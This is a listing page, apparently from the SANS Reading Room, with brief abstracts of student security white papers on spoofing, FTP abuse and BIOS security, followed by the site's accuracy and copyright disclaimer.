-
Spoofing: An Overview of Some of the Current Spoofing Threats by Neil Riser - July 1, 2001
This paper introduces and explains four forms of information spoofing: IP, ARP, Web, and DNS.
-
FTP and the Warez Scene by Shelli Crocker - December 14, 2000
Although software theft via FTP is very common, the risk of FTP abuse can be reduced by scanning networks for anonymous FTP sites, monitoring FTP activity, and securing FTP server configuration.
-
Introduction to IP Spoofing by Victor Velasco - November 21, 2000
This paper describes the use of IP spoofing as a method of attacking a network in order to gain unauthorized access.
-
Why Bother About BIOS Security? by Robert Allgeuer -
This paper gives an overview of the BIOS and its functions; a detailed discussion of known threats to the BIOS and the hardware of a PC, as well as how they could be exploited; and, finally, countermeasures that can mitigate the risks.
Most of the computer security white papers in the Reading Room have been written by students seeking GIAC certification to fulfill part of their certification requirements and are provided by SANS as a resource to benefit the security community at large. SANS attempts to ensure the accuracy of information, but papers are published "as is". Errors or inconsistencies may exist or may be introduced over time as material becomes dated. If you suspect a serious error, please contact webmaster@sans.org.
All papers are copyrighted. No re-posting or distribution of papers is permitted.
SANS.edu Graduate Student Research - This paper was created by a SANS Technology Institute student as part of the graduate program curriculum.